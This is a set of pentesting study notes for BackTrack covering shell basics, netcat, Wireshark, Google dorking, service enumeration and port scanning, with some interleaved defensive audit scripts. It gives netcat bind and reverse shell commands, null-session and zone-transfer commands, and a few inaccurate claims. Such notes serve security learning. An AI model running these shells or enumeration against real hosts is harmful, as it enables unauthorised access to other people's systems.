Table of Contents

Introduction......................................................................................................................5
BackTrack Basics.............................................................................................................6
XWindow..............................................................................................................................................6
Set IP Through DHCP.........................................................................................................................6
Set Static IP..........................................................................................................................................6
Start SSH Service................................................................................................................................6
Start Apache Service...........................................................................................................................6
Start TFTP Service..............................................................................................................................7
Starting VNC Service..........................................................................................................................7
Checking Open Ports..........................................................................................................................7

Bash Basics........................................................................................................................7
Commands...........................................................................................................................................7
Special Characters...............................................................................................................................8
Asterisk.............................................................................................................................................8
Question Mark..................................................................................................................................8
Arrows..............................................................................................................................................9
Double Arrows..................................................................................................................................9
Pipe...................................................................................................................................................9
Grep....................................................................................................................................................10
Cut.......................................................................................................................................................10
Sort......................................................................................................................................................10
Scripting.............................................................................................................................................10

Netcat...............................................................................................................................10
Netcat Client Connection..................................................................................................................11
Netcat Server Connection.................................................................................................................11
Bind Shells..........................................................................................................................................11
Reverse Shells.....................................................................................................................................11
Netcat vs. nc.traditional....................................................................................................................12

Wireshark........................................................................................................................12
Using...................................................................................................................................................12
The TCP 3-Way Handshake (Getting a Website).......................................................................12
Filters..................................................................................................................................................12
Password Grabbing...........................................................................................................................13

Reconnaissance ..............................................................................................................13
Google.................................................................................................................................................13
Google Symbols..................................................................................................................................14
Quotes.............................................................................................................................................14
Asterisk...........................................................................................................................................14
Minus..............................................................................................................................................14
Google Operators..............................................................................................................................14
intitle...............................................................................................................................................14
inurl.................................................................................................................................................14
site...................................................................................................................................................15
cache...............................................................................................................................................15
Evil Google Searches.....................................................................................................................15
Google Dorks......................................................................................................................................15

Service Enumeration......................................................................................................15
Whois Enumeration..........................................................................................................................15
DNS Server Enumeration.................................................................................................................16
Host Lookup.......................................................................................................................................16
Reverse Host Lookup........................................................................................................................16
DNS Zone Transfers..........................................................................................................................16
SNMP Enumeration..........................................................................................................................17
SMTP Enumeration..........................................................................................................................17
OS Fingerprinting.............................................................................................................................17
NetBIOS Enumeration......................................................................................................................17
Active Directory Enumeration.........................................................................................................17
SMB Enumeration.............................................................................................................................18
Windows Null Sessions..................................................................................................................18
enum4linux.....................................................................................................................................18
smb-enum-users..............................................................................................................................18
smb-enum-shares............................................................................................................................18

Maltego............................................................................................................................18
Port Scanning..................................................................................................................19
Theory.................................................................................................................................................19
Types...................................................................................................................................................19
Problems.............................................................................................................................................20
Ping Assumptions...........................................................................................................................20
UDP Scans Problems......................................................................................................................20
nmap...................................................................................................................................................20
NSE.................................................................................................................................................21
zenmap................................................................................................................................................21
Unicorn Scan......................................................................................................................................21
autoscan..............................................................................................................................................21

ARP Spoofing..................................................................................................................21
Theory.................................................................................................................................................21
Limitations.........................................................................................................................................22
Ettercap..............................................................................................................................................22
DNS Spoofing.....................................................................................................................................23

OS Vulnerabilities...........................................................................................................23
Vulnerability Assessment..................................................................................................................23
Web Server Vulnerabilities...............................................................................................................24
Database Vulnerabilities...................................................................................................................24
TCP Stack Vulnerabilities.................................................................................................................24
Application Vulnerabilities...............................................................................................................25

Denial of Service.............................................................................................................25
Theory.................................................................................................................................................25
Flood Attacks.....................................................................................................................................25
Syn Flood........................................................................................................................................25
Mitigation for SYN Floods.............................................................................................................26
UDP Flood......................................................................................................................................26
Mitigation for UDP Floods.............................................................................................................26
ICMP Flood....................................................................................................................................26
Mitigation for ICMP Floods...........................................................................................................26
Smurf Attack...................................................................................................................................26
Mitigation for Smurf Attacks..........................................................................................................26
Ping Of Death.....................................................................................................................................26
Teardrop.............................................................................................................................................27
LOIC...................................................................................................................................................27
SSL DoS..............................................................................................................................................27

Exploits............................................................................................................................27
Compiling...........................................................................................................................................27
Resources............................................................................................................................................28

Remote Administration Tools........................................................................................28


Theory.................................................................................................................................................28
Uses.....................................................................................................................................................28
Darkcomet..........................................................................................................................................28
CyberGate..........................................................................................................................................28
Solitude ..............................................................................................................................................28
Cerberus.............................................................................................................................................28
Blackshades........................................................................................................................................28

Metasploit........................................................................................................................29
msfconsole..........................................................................................................................................29
msfcli...................................................................................................................................................29
msfweb................................................................................................................................................29
msfgui.................................................................................................................................................29
Updating Metasploit..........................................................................................................................29
Exploitation........................................................................................................................................29
Payloads..............................................................................................................................................29
Meterpreter........................................................................................................................................29
Encoders.............................................................................................................................................29
Auxiliary.............................................................................................................................................30
Credential Collection.........................................................................................................................30
db_autopwn........................................................................................................................................30
Browser Autopwn..............................................................................................................................30

Anti-virus Bypass...........................................................................................................30
Theory.................................................................................................................................................30
Droppers.............................................................................................................................................30
Theory.............................................................................................................................................30
Crypters..............................................................................................................................................30
Theory.............................................................................................................................................30
The Encrypter.................................................................................................................................31
The Stub..........................................................................................................................................31
Antis................................................................................................................................................31
Junk Code..........................................................................................................................................31

Buffer Overflows............................................................................................................31
Theory.................................................................................................................................................32
Protections..........................................................................................................................................32
Common Attacks...............................................................................................................................33
Problems.............................................................................................................................................33
Fuzzers................................................................................................................................................33

Web Based Attacks.........................................................................................................34


Zero Frames and Zero Images.........................................................................................................34
Command Execution.........................................................................................................................34
Cross Site Request Forgery..............................................................................................................34
File Inclusion......................................................................................................................................35
Local...............................................................................................................................................35
Remote............................................................................................................................................35
SQL Injections...................................................................................................................................35
URL................................................................................................................................................35
Authentication Bypass....................................................................................................................37
Blind...............................................................................................................................................38
SQLmap..........................................................................................................................................38
Cross Site Scripting (XSS)................................................................................................................38
Non-Persistent................................................................................................................................38
Persistent.........................................................................................................................................38

Web Based Exploitation Frameworks..........................................................................39


OWASP Mantra.................................................................................................................................39

Port Tunneling................................................................................................................39
Theory.................................................................................................................................................39
HTTP CONNECT Tunneling...........................................................................................................40
SSL Tunneling....................................................................................................................................40
stunnel.............................................................................................................................................40
SOCKS...............................................................................................................................................40
SSH Tunneling...................................................................................................................................40
Local...............................................................................................................................................40
Remote............................................................................................................................................41
Dynamic..........................................................................................................................................41

Tor....................................................................................................................................41
Theory.................................................................................................................................................41
Installing.............................................................................................................................................41
Using...................................................................................................................................................41

Authentication Vulnerabilities.......................................................................................41
Theory.................................................................................................................................................41
Problems With Networks..................................................................................................................42
Plain Text............................................................................................................................................42
Hashing Systems................................................................................................................................42
MD4................................................................................................................................................42
DES.................................................................................................................................................42
MD5................................................................................................................................................42
SHA1..............................................................................................................................................42
NTLM.............................................................................................................................................42
MYSQL..........................................................................................................................................42
Challenge Systems.............................................................................................................................42
Uneven Algorithms............................................................................................................................43
Here Be Dragons................................................................................................................................43

Password Attacks............................................................................................................44
Theory.................................................................................................................................................44
Strong Vs. Weak Passwords.............................................................................................................44
Brute Force.........................................................................................................................................45
Dictionary...........................................................................................................................................45
Rainbow Tables..................................................................................................................................45
GPU Cracking....................................................................................................................................45
Misconceptions...................................................................................................................................46
hydra...................................................................................................................................................47
xhydra.................................................................................................................................................47
medusa................................................................................................................................................47
ncrack.................................................................................................................................................47

Wireless Attacks..............................................................................................................47
Theory.................................................................................................................................................47
WEP....................................................................................................................................................47
WEP Cracking...................................................................................................................................48
Cafe Latte........................................................................................................................................48
ARP Replay....................................................................................................................................48
Korek's Chop Chop Attack.............................................................................................................48
Hirte Attack.....................................................................................................................................49
Fragmentation Attack......................................................................................................................49
WPA....................................................................................................................................................49
WPA Cracking...................................................................................................................................49
WPA2..................................................................................................................................................49
WPA2 Cracking.................................................................................................................................49
DoS Attacks........................................................................................................................................49
Deauthentication Attacks................................................................................................................49
Man In The Middle...........................................................................................................................49

Social Engineering..........................................................................................................49

Introduction
This resource is a collection of notes that I took over the past year relating to the subject of computer
security. This note collection will not teach you by itself. It is meant to be more of a refresher, guide,
and quick resource to help people learn.
To use this, please install BackTrack. Most of the tools are already installed and will make your life a
whole lot easier.
I would also suggest brushing up on your Linux skills, as they will be used heavily in this.
If you like this document, please help support the author and donate to him. The author needs to eat
too. If you have any questions, my contacts are as follows.


Email napalmfire.df@gmail.com
Skype napalmfiredf

BackTrack Basics
BackTrack normally starts in command line mode.
The default log-in is

User: root

Pass: toor

XWindow
To begin using BackTrack we must start the GUI.
startx

This will start KDE or GNOME depending on the version. However, not all tools are GUI based; use
Konsole for those. The /pentest/ directory has all the tools you will need.

Set IP Through DHCP

dhcpcd [interface]

However in BT4 you must first install dhcpcd on new installations using apt-get install dhcpcd.

Set Static IP
ifconfig [interface] [ip]/24
route add default gw [gateway]
echo nameserver [gateway] > /etc/resolv.conf

Start SSH Service


Go to Start -> Services -> SSH -> Setup SSH
This will generate SSH keys and start the service.
SSH port is 22.
service ssh start

Start Apache Service


Go to Start -> Services -> HTTPD -> Start HTTPD
HTTPD port is 80
service httpd start

Start TFTP Service


atftpd --daemon --port 69 /tmp/

or Start -> Services -> TFTP -> Start TFTP - TFTP port is 69

Starting VNC Service


vncserver

or Start -> Services -> VNC -> Start VNC


VNC port is 5901 (Add +1 to port for every new connection)

Checking Open Ports


netstat -ant | grep [port]

netstat lists the sockets on the host (-a all sockets, -n numeric addresses, -t TCP only) and grep filters the results down to the port of interest.
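As an added example (not from the original notes), the shell functions below do the same check more carefully. The netstat -ant output is constructed; the functions read the port out of the Local Address column rather than grepping the whole line, because a bare grep for 22 also matches port 2222 and an address such as 192.168.0.22.

```shell
#!/bin/sh
# Added example, not from the original notes. The netstat output below is
# constructed to look like "netstat -ant" on a BackTrack box.
sample_netstat() {
    cat <<'EOF'
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:5901          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:2222            0.0.0.0:*               LISTEN
tcp        0      0 192.168.0.22:49152      192.168.0.1:80          ESTABLISHED
tcp6       0      0 :::80                   :::*                    LISTEN
EOF
}

# Print every listening port once, numerically sorted. The port is the text
# after the last ":" of the Local Address column ($4), which also copes with
# IPv6 addresses such as ":::80".
listening_ports() {
    awk '$NF == "LISTEN" { n = split($4, a, ":"); print a[n] }' | LC_ALL=C sort -n | uniq
}

# Exit 0 if the given port is in LISTEN state, 1 otherwise. Reads netstat
# output on stdin.
port_is_listening() {
    awk -v p="$1" '
        $NF == "LISTEN" { n = split($4, a, ":"); if (a[n] == p) found = 1 }
        END { exit found ? 0 : 1 }'
}

# The naive check from the notes: count lines containing the port number
# anywhere. For "22" this also counts 2222 and 192.168.0.22, so it overcounts.
naive_grep_count() {
    grep -c "$1"
}
```

Run `sample_netstat | listening_ports` to see the cleaned-up list, and compare `sample_netstat | naive_grep_count 22` (three hits) with `sample_netstat | port_is_listening 22` (exactly one port) to see why the column-aware version is the one to trust.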

Bash Basics
BASH or the Bourne Again Shell is the terminal on which most Linux computers operate. This lets us
pass commands directly to the OS, allowing us greater control and access.

Commands
The basic structure of a command:
command argument argument argument

Here the command command is run, using argument as its argument. A command is the program being
run; an argument is the data that the user wishes to pass to that program. Not all programs need to
receive data; some perform a single fixed function.
An example of a useful command:
cat emails.txt

This runs the program cat and tells it to open emails.txt.


Another thing to be wary of is switches. Switches usually have a - or -- in front. These are used to
tell the program to operate a certain way, or to denote a specific field of input.
Consider:

nmap -sV -sS 192.168.0.1

This line runs the program nmap and tells it to use the -sV and -sS functions in nmap on the IP
192.168.0.1.
Another example:
cut -d -f3 emails.txt

This would invoke the program cut and tell it to use the -d switch with the delimiter as an argument. It also
tells it to use -f and send 3 as an argument to -f.

Special Characters
Certain characters have special meanings in BASH and are very useful to us when dealing with large
amounts of data.

Asterisk
The asterisk is a character that expands to every file name matching the pattern around it. For instance, consider
this directory listing.

email-jodie.txt

email-sam.txt

email-unwanted.pdf

junk.txt

morejunk.txt

Let's say we want to cat all the text files with email in the name. We could go through and cat them one
by one, but that would take too long. So instead we use the asterisk to fill in all possibilities.
cat email*

While this would cat the files we did want, it will also cat email-unwanted.pdf because it was in our
range of text. Let's try again, this time limiting it only to text files.
cat email*.txt

This would cat only the files we want, ensuring no extra worthless data gets into our search.
Alternatively, an even easier way to do this would be to use:
cat e*.txt

This would do the exact same thing, in fewer characters.

Question Mark
Similar to the asterisk, but limited to matching exactly one character.

Consider this directory listing:


cats1.txt
cats2.txt
cats3.txt
cats1-backup.txt
cats2-backup.txt
cats3-backup.txt

Our goal is to cat all the files that aren't backups. If we were to use the star in this situation, it would
return all the results, so we can use a question mark to search for files with only one letter from what
we need.
cat cats?.txt

Arrows
Arrows, sometimes referred to as tacs, are used to write to and read from a file with a command. For
example, let's say that you wish to save the output of a program into a file. You can use the arrow to
write that output directly to it, making your life easier.
nmap 192.168.0.1 > file.txt

Here we take the output of nmap and stuff it into file.txt, allowing us to save the results of our scan.
When doing this, if the file previously existed, it erases all the data in the file before adding the new
data.
We can also read input from files.
cut -d -f3 < ip.txt

This would send the contents of ip.txt into the cut program.

Double Arrows
Double arrows, sometimes referred to as tac-tacs, are used to add data to an already existing file.
For example, let's say you wanted to add the result of a new nmap scan to a file you already created.
nmap 192.168.0.1 >> file.txt

This would append to the file instead of overwriting it.

Pipe
The pipe is an extremely useful character, especially for text manipulation, among other things.
Pipe takes the output of one program and uses it as input for another.
For example:

nmap 192.168.0.1 | grep smb

This would run nmap and then send the output to grep to use how it pleases. This can be useful for
handling huge amounts of text (which we will see later when talking about cut and sort).

Grep
Grep is a program that will search text for a specific pattern, and then output only the lines which
contain the pattern.
For instance, let's say we have a large configuration file and there is an option whose value we need to find.
Using grep, we can search the configuration file for that text and have it display the result.
cat long.conf | grep hard-to-find-value

Cut
Cut is a program that is used to split text based on a delimiter. This allows us to quickly get text that
might be several characters deep.
For example, examine this set of text.
id:user:password:email
1:admin:secret:admin@admin.com

Say we only want all the usernames, we could use : as a delimiter, and specify what field we want to
get, which, in this example, would be two.
cut -d':' -f2

This will output:


user
admin

Sort
Sort allows us to sort text, but it also has a nifty feature (the -u switch) that allows us to remove duplicates.
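Putting the asterisk, question mark, arrows, pipe, grep, cut and sort features above together, as an added example that is not from the original notes: the file names reuse the listings above, while the file contents and the users.txt table are constructed.

```shell
#!/bin/sh
# Added example, not from the original notes: exercises the glob, redirect,
# pipe, grep, cut and sort features described above on constructed files.

# Create a scratch directory holding the listings used in the notes.
# File contents are constructed; only the names come from the notes.
make_sample_dir() {
    dir=$(mktemp -d)
    for f in email-jodie.txt email-sam.txt junk.txt morejunk.txt \
             cats1.txt cats2.txt cats3.txt \
             cats1-backup.txt cats2-backup.txt cats3-backup.txt; do
        printf 'contents of %s\n' "$f" > "$dir/$f"
    done
    printf '%%PDF-1.4 constructed binary junk\n' > "$dir/email-unwanted.pdf"
    # A colon-delimited table in the id:user:password:email layout from the
    # Cut section, with a duplicate username so that sort -u has work to do.
    printf 'id:user:password:email\n1:admin:secret:admin@admin.com\n2:jodie:hunter2:jodie@example.com\n3:admin:other:admin2@example.com\n' \
        > "$dir/users.txt"
    echo "$dir"
}

# Asterisk: e*.txt matches every .txt file starting with "e", so the
# unwanted PDF is left out. Output is one name per line, in glob order.
list_email_text_files() {
    ( cd "$1" && for f in e*.txt; do echo "$f"; done )
}

# Question mark: cats?.txt matches exactly one character between "cats"
# and ".txt", so the -backup copies are skipped.
list_non_backup_cats() {
    ( cd "$1" && for f in cats?.txt; do echo "$f"; done )
}

# Cut: field 2 of each colon-separated line, duplicates included.
usernames() {
    cut -d':' -f2 "$1"
}

# Pipe + cut + sort -u: the same field, sorted, with duplicates removed.
# LC_ALL=C makes the sort order independent of the user's locale.
unique_usernames() {
    cut -d':' -f2 "$1" | LC_ALL=C sort -u
}

# Grep: only the lines containing the pattern survive.
lines_matching() {
    grep "$2" "$1"
}

# Single arrow truncates the file, double arrow appends to it; the function
# returns the resulting line count so the difference is visible.
write_then_append() {
    echo "first scan"  >  "$1"   # > replaces any previous contents
    echo "second scan" >> "$1"   # >> adds to the end
    wc -l < "$1" | tr -d ' '
}
```

A typical run is `d=$(make_sample_dir); unique_usernames "$d/users.txt"`, which prints admin, jodie and user once each even though admin appears twice in the table.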

Scripting

Netcat
Netcat - A tool used to write data directly to a TCP/UDP port. Can be in client mode or server mode.

Netcat Client Connection


This mode sets Netcat to client mode. This connects to a server through a port defined as an argument.
This allows the client to receive and transmit data to the server.
nc -v [ip] [port]

Netcat Server Connection


This mode sets Netcat to server mode. This allows clients to connect to that port and receive and
transmit raw data.
nc -lvvp [port]

Sending a File
nc -vv [ip] [port] < [file]

Receiving a File
nc -lvvp [port] > [file]

Bind Shells
Netcat has the ability to redirect the input and output of a console to a TCP/UDP port. This can allow
remote administration. This is called a bind shell. This then allows a server to broadcast its shell to
others.
Server
nc -lvvp [port] -e [shell]

As a note, Linux's shell is located at /bin/bash while Windows's shell is cmd.exe.


Client
nc -v [ip] [port]

Now the shell is transmitted to the client when he connects to the server.

Reverse Shells
This works the reverse of a bind shell. This allows the client to transmit their shell to a server. This has
the same effect as the bind shell.
Server
nc -lvvp [port]

Client
nc -v [ip] [port] -e [shell]


Netcat vs. nc.traditional


In some Linux environments, nc might already be installed. However, this version is different from the
original netcat. To get the original version of netcat, use
apt-get install nc.traditional

You will also have to replace nc with nc.traditional in the preceding commands.

Wireshark
Wireshark is a packet sniffer which can capture packets and display the contents of them.

Using
wireshark &

This will put wireshark in the background of the console.


Once loaded, it is simple to use. Just select the interface you'd like to listen in on. Once in listening
mode, Wireshark will capture all incoming packets on that interface.

The TCP 3-Way Handshake (Getting a Website)


Wireshark lists captured packets in order, with the most recent packet last; the list grows downward. Here
we can see a sample capture of the process of making a connection and getting a webpage through
HTTP.

#  Source   Destination  Protocol  Info                          Description
1  You      Gateway      DNS       Standard query of host        You ask the gateway where the host is.
2  Gateway  You          DNS       Standard query response [ip]  Gateway tells you the IP address.
3  You      Host         TCP       SYN                           1st part of 3-way handshake.
4  Host     You          TCP       SYN, ACK                      2nd part of 3-way handshake.
5  You      Host         TCP       ACK                           3rd part of 3-way handshake.
6  You      Host         HTTP      GET/HTTP                      Beginning of sending webpage.

Filters
Filters let you exclude packets based on search patterns. For instance, lets say you'd like to only see
traffic on port 1234. Filters will let you exclude anything that isn't on those ports.
tcp.port==1234


Filters also support Boolean logic. For instance, let's say you'd like to see traffic on both port 1234 and
port 4321.
tcp.port==1234 || tcp.port==4321

This will display both ports' traffic; with && instead of ||, a packet would have to involve both ports at once to match.

Password Grabbing

Reconnaissance
More info = higher chance of success.
Passive Reconnaissance - Stealthily gathering information in a non-intrusive way. There is little to no
chance of being caught.
Active Reconnaissance - Gathering information in a way that is intrusive and may be detected by an
IDS. There may be a medium to high risk of detection.
Look for:

Names

Numbers

Emails

Addresses

Affiliates

Links

IP addresses

Nameservers

Site Maps

Google
Google crawls a huge host of web sites, often crawling through poorly configured webservers.
Using specific search terms we will be able to find things about webservers or be able to increase our
attack surface through the information we gather here.
Some examples would be:

Possible SQL injections

Possible XSS attacks

Webmail logins

SQL Dumps

Administration pages

Web backdoors

Misconfigured web applications

Google Symbols
Google symbols let us refine our search options, letting us quickly and efficiently get the data we need.

Quotes
"search terms"

Putting a term in quotes only displays pages with that sequence of text. This is opposed to no quotes
which will display all pages containing part or all of the text, regardless of sequence.

Asterisk
* birds

The asterisk will fill in all possible terms for a sequence. For instance, the asterisk here will fill in all
the different types of birds and much more, in an attempt to find your term.

Minus
blue foot boobies -porn

The minus excludes pages containing a specified term. For example, this search excludes any pages with the
term porn in them, since Google would otherwise display all pages containing boobies.

Google Operators
Google has many operators that can help us narrow our search results. Many of them will scour pages
looking for the exact information we need, others can restrict data to certain types.

intitle
The intitle operator restricts search results to only pages that contain a pattern in the title. For example:
intitle:National Geographic Africa

The above will display results from pages that have National Geographic in the title and also have
Africa on the page. This is useful for finding admin pages, as well as file indexes.

inurl
The inurl operator lets us restrict results to those with the search terms in the URL. Using this we can
often find potentially vulnerable pages or specific admin login pages.


inurl:admin.php login

site
The site operator lets us restrict results to those of a specific domain. This allows us to narrow our search
to a specific target.
site:vulnerable.com inurl:admin.php login

cache
The cache operator lets us see the last version of a webpage crawled by Google. By using this we can
often find results of a webpage that were deleted some time ago.
cache:google.com

Evil Google Searches


I will only cover a few here, since the topic has almost endless searches. The idea of evil Google
searches is to find pages that are vulnerable, have default passwords, or find caches of information.
These searches allow an attacker to search specific websites for vulnerabilities.
For example:
Let's look for default XAMPP installs.

Google Dorks

Service Enumeration
Service Enumeration is the technique of looking for open information about a target's ISP, nameservers,
IP addresses, and running protocols.

Whois Enumeration
whois [url/ip]

Gives:

Web server admin

Numbers

Emails

Nameservers

DNS Server Enumeration


nslookup            Begins DNS lookup
>[website]          Gives DNS info on specified domain
>set type=mx        Gives Mail Exchange servers
>set type=ms        Gives mail server IPs.

Host Lookup
Use this to get an IP address for a domain.
host [url]

You can also use the -t switch to specify type of server.


Look up nameservers for a specified host.
host -t ns [url]

Look up mail exchange for a specified host.


host -t mx [url]

Reverse Host Lookup


This lets you take an IP and reverse it into a domain. Using this we can often find out about the
domains IP addresses are attached to.
host [ip]

DNS Zone Transfers


DNS zone transfers are a problem existing in misconfigured DNS servers which allow nameserver
communication. With this, an attacker can get the entirety of an external network handed to them by
just asking for a copy of the zone record.
We can perform these attacks using host. We first need a list of nameservers, which can be provided by
using nslookup.

host -l [victim url] [our url]

This will attempt a zone transfer to our own URL. If successful, it will give us all the IP/URL matchups for us to use, exposing hidden subdomains to us.
This kind of attack might not always be successful and can easily be configured to be detected.
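The defender-side counterpart of the zone transfer above is to check which zones a nameserver will hand out. As an added example that is not from the original notes, the shell functions below audit a BIND named.conf for its allow-transfer policy; the configuration, zone names and addresses are constructed placeholders, and the parser only handles the one-clause-per-line layout shown.

```shell
#!/bin/sh
# Added example, not from the original notes: a defender-side audit of which
# zones a BIND named.conf lets anyone transfer (AXFR). The configuration
# below is constructed; the zone names and addresses are placeholders.
sample_named_conf() {
    cat <<'EOF'
options {
    directory "/var/named";
    allow-transfer { any; };          // weak global default: anyone may AXFR
};
zone "example.com" {
    type master;
    file "example.com.zone";          // no zone-level clause: inherits "any"
};
zone "internal.example.com" {
    type master;
    file "internal.zone";
    allow-transfer { 192.0.2.2; 192.0.2.3; };   // only the secondaries
};
zone "test.example.com" {
    type master;
    file "test.zone";
    allow-transfer { none; };
};
EOF
}

# Print "<zone> <effective allow-transfer>" for each zone, resolving a missing
# zone-level clause against the options block. Only the first address of a
# list is shown; "unset" means neither the zone nor options set a policy.
zone_transfer_policy() {
    awk '
        /^[ \t]*options[ \t]*[{]/ { inopt = 1; next }
        /^[ \t]*zone[ \t]+"/ {
            match($0, /"[^"]*"/)
            zone = substr($0, RSTART + 1, RLENGTH - 2); zonexfer = ""; next
        }
        /allow-transfer/ {
            v = $0
            sub(/.*allow-transfer[ \t]*[{][ \t]*/, "", v)   # drop text up to "{"
            sub(/[ \t]*;.*/, "", v)                          # keep the first entry
            if (inopt) optxfer = v; else zonexfer = v
            next
        }
        /^[ \t]*[}];/ {
            if (inopt) { inopt = 0 }
            else if (zone != "") {
                eff = (zonexfer != "") ? zonexfer : (optxfer != "" ? optxfer : "unset")
                print zone, eff
                zone = ""
            }
        }'
}

# Zones whose effective policy is "any": these hand their whole record set to
# whoever asks, which is exactly the exposure described in the notes.
zones_open_to_any_transfer() {
    zone_transfer_policy | awk '$2 == "any" { print $1 }'
}
```

Running `sample_named_conf | zones_open_to_any_transfer` reports only example.com: it has no clause of its own and so inherits the global `any`, which is the kind of silent inheritance that makes a zone transferable without anyone having written "any" next to the zone itself.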

SNMP Enumeration
Simple Network Management Protocol is a UDP based protocol that monitors network attached
devices. Its authentication method is using public and private keys. Public keys may not have all
permissions, however, only read access is needed to enumerate. The public key is usually public.

Weak authentication system.

Vulnerable to IP-spoofing.

To begin using SNMP use the following command.


snmpwalk -c [key] -v1 [ip] 1

SMTP Enumeration
Simple Mail Transfer Protocol handles outgoing email.
Checks if user is valid.
vrfy [user]

OS Fingerprinting
OS Fingerprinting is the process of scanning open ports and banner grabbing to detect the OS.
Once used you can figure out what exploits to use. Nmap provides free OS detection.
nmap -O [ip]

NetBIOS Enumeration
NetBIOS (Network Basic Input Output System) is a forgotten technology that runs by default on most
Windows computers. It provided early name resolution. This task is now more commonly handled by
DNS, but NetBIOS still runs as a default service on most Windows computers.
NBTScan - Free NetBIOS scanner.

Active Directory Enumeration


Active Directory - Contains records of users, servers, sites, and workgroups.
Every account on the system has read permissions. It uses LDAP. Ldp.exe is commonly used to control
AD. You can possibly authenticate with a Guest or null account.
It would only take one compromise to get all the AD info.

SMB Enumeration
SMB enumeration is extremely useful as Windows runs it as a default service. We can use this to find a
list of users (Making password cracking easier), mount remote shares and, even run executables
through it.

Windows Null Sessions


A Windows null session is the ability to log in to a Windows computer through SMB and view info
about the computer. You do this by supplying an empty user name and password. Then you can mount shares from
the computer.
To use it you must use the command line in Windows.
net use \\[host]\ipc$ "" /USER:""

If the command is successful the attacker can use the net view command to view information about the
computer such as users, processes , services, and uptime.
You may also be able to gain C: drive access by going to Run \\share\c$

enum4linux
enum4linux is a tool based on a Windows tool called enum.exe. It carries many of the same
features and is extremely comprehensive in its data.

smb-enum-users
This script lets us enumerate the users on a remote Windows computer. This script is very similar to
enum.exe for Windows.
nmap -sS -sU --script smb-enum-users.nse -p U:137,T:139,445 [host]

WARNING! This script has two options lsaonly and samronly. samronly REQUIRES a real user
account, not just guest. lsaonly requires only a guest account.

smb-enum-shares
This script lets us enumerate the shares of a remote windows computer.

Maltego


Port Scanning
Theory
Port Scanning - The technique of scanning for open ports to ascertain information about a target
computer. It is the first action to take before attempting an exploit. It is part of the information gathering
phase. Can be intrusive and detected by an IDS.
Packets - Information sent over the network in smaller chunks. Uses flags to indicate the type of
packet. Flags can be mixed.

Types
Type   Meaning
Syn    Initial Packet (Begin handshake)
Ack    Acknowledgment (Reply for packet received)
Fin    Finish (Done with connection)
Urg    Urgent
Psh    Push
Rst    Reset (Sent to reset the TCP handshake)

TCP - Port that uses a 3-way handshake to identify open ports and begin data transfers.
UDP - A port that uses a stateless system. If the port is open there is no reply. If it is closed you get an
ICMP ping.
Full Scan - Completes 3-way handshake. Is intrusive and easily detected but, reliable.
Half Scan/SYN Scan - Sends only SYN packets and does not complete the handshake. This makes it
harder to detect.
UDP Scan - Scans UDP ports. However it is unreliable because UDP is stateless. If the port is up there
is no reply. If it is down the source receives an ICMP unreachable.
Stealth Scan - Uses the same method as a SYN scan but varies the frequency and timing and randomizes the
ports scanned, making it harder to detect.
Xmas Scan - Creates a malformed packet with PSH, FIN, and URG flags to scan a system. Doesn't
work against Windows.
Ack Scan - Scanner sends ACK packets and receives a RST packet back. This shows the attacker
which ports are open.
ICMP Scan - Very detectable ping scan. Rarely used because it is unreliable, inefficient, and
detectable.

Problems
Port scans often times are noisy and dangerous, doing one can make you an easy target for an IDS or
firewall logging system.

Ping Assumptions
In most cases, unless told not to, scanners will attempt to ping the host before attempting a port scan. If
it doesn't get a ping back the host is considered as not alive. This I a false assumption in some cases
and can provide faulty scan results, telling you that computers are not alive that actually are and are just
not responding to ping probes.

UDP Scan Problems


Since UDP scans are stateless, there can be issues with the detection process. For example, a firewall
can be blocking probes to certain ports and you'll never know.
It could also allow the data through but not kill the ICMP Unreachable packet on its way out.
As a result, take UDP scans with a grain of salt; chances are you aren't seeing the full picture.
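The noise that the Problems section mentions is what a defender keys on: a SYN scan shows up in firewall logs as one source sending bare SYNs to many distinct ports. As an added example that is not from the original notes, the shell functions below pull that pattern out of log lines. The lines are constructed to follow the field layout of the iptables LOG target (SRC=, DST=, PROTO=, DPT= and TCP flag names); the hosts and timestamps are placeholders.

```shell
#!/bin/sh
# Added example, not from the original notes: flag hosts whose firewall log
# entries look like a SYN scan (one source, many distinct destination ports,
# bare SYNs). The log lines are constructed to follow the field layout of the
# iptables LOG target (SRC=, DST=, PROTO=, DPT=, TCP flag names).
sample_firewall_log() {
    # One host probing ten different ports with bare SYNs: the scan pattern.
    for p in 21 22 23 25 80 110 139 443 445 3389; do
        printf 'Jan 10 12:00:01 gw kernel: IN=eth0 OUT= SRC=192.168.0.50 DST=192.168.0.1 PROTO=TCP SPT=40000 DPT=%s SYN URGP=0\n' "$p"
    done
    # A normal client that only ever opens ports 80 and 443.
    for p in 80 80 443 80; do
        printf 'Jan 10 12:00:02 gw kernel: IN=eth0 OUT= SRC=192.168.0.60 DST=192.168.0.1 PROTO=TCP SPT=51000 DPT=%s SYN URGP=0\n' "$p"
    done
    # The server's SYN/ACK reply: it carries ACK, so it is not a probe.
    printf 'Jan 10 12:00:02 gw kernel: IN=eth0 OUT= SRC=192.168.0.1 DST=192.168.0.60 PROTO=TCP SPT=80 DPT=49152 ACK SYN URGP=0\n'
}

# Read log lines on stdin; print "<src> <distinct ports>" for every source that
# sent bare SYNs to at least $1 distinct destination ports.
syn_scan_suspects() {
    awk -v thr="$1" '
        /PROTO=TCP/ && / SYN / && !/ ACK / {
            src = ""; dpt = ""
            for (i = 1; i <= NF; i++) {
                if ($i ~ /^SRC=/) src = substr($i, 5)
                else if ($i ~ /^DPT=/) dpt = substr($i, 5)
            }
            # count each (source, port) pair once, however often it repeats
            if (src != "" && dpt != "" && !seen[src, dpt]++) ports[src]++
        }
        END { for (s in ports) if (ports[s] >= thr) print s, ports[s] }' | LC_ALL=C sort
}
```

With `sample_firewall_log | syn_scan_suspects 5` only 192.168.0.50 is reported (ten distinct ports); the web client touches just two ports and the server's SYN/ACK is ignored. The threshold is the tuning knob: too low and ordinary clients trip it, too high and a slow scan spread over time slips under it, which is exactly what the Stealth Scan entry above relies on.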

nmap
Nmap runs a port scan on the specified IP.
nmap -p [port] [ip]

Full port scan.

nmap -p 1-65535 [ip]

OS detection

nmap -O [ip]

Service versions scan

nmap -sV [ip]

Comprehensive scan
nmap -A [ip]


NSE
The nmap Scripting Engine is a tool which allows us to write and use scripts to aid us in our
penetration testing goals. We used a script earlier in the SMB Enumeration section to attempt an
enumeration of users on a system.
We can see the various .nse scripts included with nmap on their site, and we can also see them by going
through the nmap scripts directory.
